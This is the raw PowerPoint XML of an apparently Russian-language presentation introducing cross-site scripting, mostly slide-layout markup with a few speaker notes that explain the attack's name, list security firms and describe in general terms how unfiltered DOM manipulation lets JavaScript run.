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2" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId18"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="582" r:id="rId6"/>
    <p:sldId id="586" r:id="rId7"/>
    <p:sldId id="583" r:id="rId8"/>
    <p:sldId id="519" r:id="rId9"/>
    <p:sldId id="588" r:id="rId10"/>
    <p:sldId id="587" r:id="rId11"/>
    <p:sldId id="589" r:id="rId12"/>
    <p:sldId id="590" r:id="rId13"/>
    <p:sldId id="591" r:id="rId14"/>
    <p:sldId id="592" r:id="rId15"/>
    <p:sldId id="593" r:id="rId16"/>
    <p:sldId id="545" r:id="rId1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teryna Ovechenko" initials="KO" lastIdx="12" clrIdx="0"/>
  <p:cmAuthor id="1" name="Andrey Dogadin" initials="AD" lastIdx="0" clrIdx="1"/>
  <p:cmAuthor id="2" name="Olga Litvin" initials="OL" lastIdx="3" clrIdx="2">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Olga Litv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3C8"/>
    <a:srgbClr val="8DCC00"/>
    <a:srgbClr val="BFBFBF"/>
    <a:srgbClr val="934BC9"/>
    <a:srgbClr val="003296"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="0099FF"/>
    <a:srgbClr val="92D400"/>
    <a:srgbClr val="0042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43" autoAdjust="0"/>
    <p:restoredTop sz="59609" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="315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13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0BD051-AD46-4A90-BC8D-77F743604703}" type="datetimeFigureOut">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:pPr/>
              <a:t>26.02.2015</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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081650-639F-4DB8-8B35-E0F79C3DE5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930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Спасибо,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> что присоединились…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Как раз отличное время поспать после обеденного перерыва (регламентированное время около часа – как раз выспитесь… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Почему именно об ХСС</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	1) атака, которая помогла нам провернуть взлом в нашем первом проекте</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	2) на первый взгляд она кажется плевой задачкой, однако копнув глубже, понимаешь – не все так просто….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>весьма специфическая атака требующая выполнения определенных условий</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>	3) ну и количество веб-приложений (сайтов), уязвимых к этой атаке пугающе велико…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081650-639F-4DB8-8B35-E0F79C3DE5A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553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en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Trustware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> одна из компаний-лидеров на рынке безопасности ИТ. Имеет громадное количество клиентов, как в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>гос</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> секторах, военных организациях, так и в коммерческом секторе. Только за прошлый год – около 9 млн проверенных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>вэб</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> приложений и 2 млн. сетей. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>WhiteHat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Secotury</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Калифорнийская компания, организована в 2001м, около 600 клиентов в США (финансовый сектор, банки страхование)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>С</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>enzic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>секурити</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> компания, которая обслуживает практически все компании из списка </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Fortune 1000 companies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>AT&amp;T, Apple, Wal-Mart Stores, General Motors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>…)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> C 2014 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>часть </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Trustware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>международное сообщество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081650-639F-4DB8-8B35-E0F79C3DE5A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173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Х</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> поставили, чтобы не путать название атаки с технологией </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Почему</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> атака – потому что один и тот же код уязвим к разным типам атак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081650-639F-4DB8-8B35-E0F79C3DE5A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9089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чем суть?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>1) из далека - HTML в браузере представляется как раз в виде ДОМ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>2) из </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> есть возможность манипулирования структурой и данными </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>3) А раз так, то иногда, когда не ведется фильтрация данных, мы, модифицируя </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>   ДОМ сайта можем добиться выполнение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaScripta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> в контексте уязвимого сайта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081650-639F-4DB8-8B35-E0F79C3DE5A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118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ront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Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436459" y="6571676"/>
            <a:ext cx="527541" cy="10772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b-NO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:fld id="{EC7A8707-7177-47AC-8080-FB097658370C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/26/2015</a:t>
            </a:fld>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="SKISSE_IC_Powerpointmal_stripped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265781" y="265782"/>
            <a:ext cx="8611313" cy="5675063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D709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279" tIns="32139" rIns="64279" bIns="32139" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="nb-NO" sz="1800"/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296329"/>
            <a:ext cx="7772400" cy="1384799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4199" b="0" u="none" cap="all" baseline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84999" y="1525932"/>
            <a:ext cx="7773469" cy="741512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2100" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685266" y="3842975"/>
            <a:ext cx="7773469" cy="760140"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr"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5673938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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{037E13A9-09CF-461A-A895-D59E288EE509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49690" y="6438909"/>
            <a:ext cx="5886425" cy="2227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APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW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762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lysbilde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265781" y="265782"/>
            <a:ext cx="8611313" cy="5675063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4140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279" tIns="32139" rIns="64279" bIns="32139" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="nb-NO" sz="1800"/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296329"/>
            <a:ext cx="7772400" cy="1384799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4199" b="0" u="none" cap="all" baseline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84999" y="1525932"/>
            <a:ext cx="7773469" cy="741512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2100" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685266" y="3842975"/>
            <a:ext cx="7773469" cy="760140"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr"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7671220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hold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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Plassholder for bilde 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5738485" y="1480782"/>
            <a:ext cx="2898282" cy="4467656"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="1645290"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" smtClean="0"/>
              <a:t>Sett inn bilde</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Plassholder for innhold 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531563" y="1480782"/>
            <a:ext cx="5024531" cy="44676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sp>
        <p:nvSpPr>
          <p:cNvPr id="12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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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222414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kille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265781" y="265782"/>
            <a:ext cx="8611313" cy="5675063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D709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279" tIns="32139" rIns="64279" bIns="32139" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="nb-NO" sz="180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65781" y="265782"/>
            <a:ext cx="8611313" cy="5675063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2799" b="1" u="none" cap="all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nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6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9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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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352660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killeside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265781" y="265782"/>
            <a:ext cx="8611313" cy="5675063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4140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279" tIns="32139" rIns="64279" bIns="32139" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="nb-NO" sz="180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65781" y="265782"/>
            <a:ext cx="8611313" cy="5675063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="2799" b="1" u="none" cap="all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nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6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9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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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3490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t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4" name="Plassholder for bilde 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531563" y="1480782"/>
            <a:ext cx="8100000" cy="4467656"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="1645290"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" smtClean="0"/>
              <a:t>Sett inn bilde</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6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8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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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194863"/>
      </p:ext>
    </p:extLst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t bilde - uten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bilde 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531563" y="455625"/>
            <a:ext cx="8100000" cy="5485219"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="2252783"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" smtClean="0"/>
              <a:t>Sett inn bilde</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6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7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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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056421"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf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11" name="Plassholder for innhold 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531563" y="1480782"/>
            <a:ext cx="3923438" cy="44676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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Plassholder for innhold 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714962" y="1480782"/>
            <a:ext cx="3923438" cy="44676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sp>
        <p:nvSpPr>
          <p:cNvPr id="8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851026" y="6438909"/>
            <a:ext cx="624554" cy="223662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:fld id="{CA843FE4-C2E6-4202-9C92-A3FC33743ED6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9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49690" y="6438909"/>
            <a:ext cx="5886425" cy="222750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Application Performance Management Service Offering Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10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417729" y="6440278"/>
            <a:ext cx="434100" cy="223148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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033428"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf hd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31563" y="1480781"/>
            <a:ext cx="3923438" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2300" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457096" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914190" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371287" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828381" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2285477" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
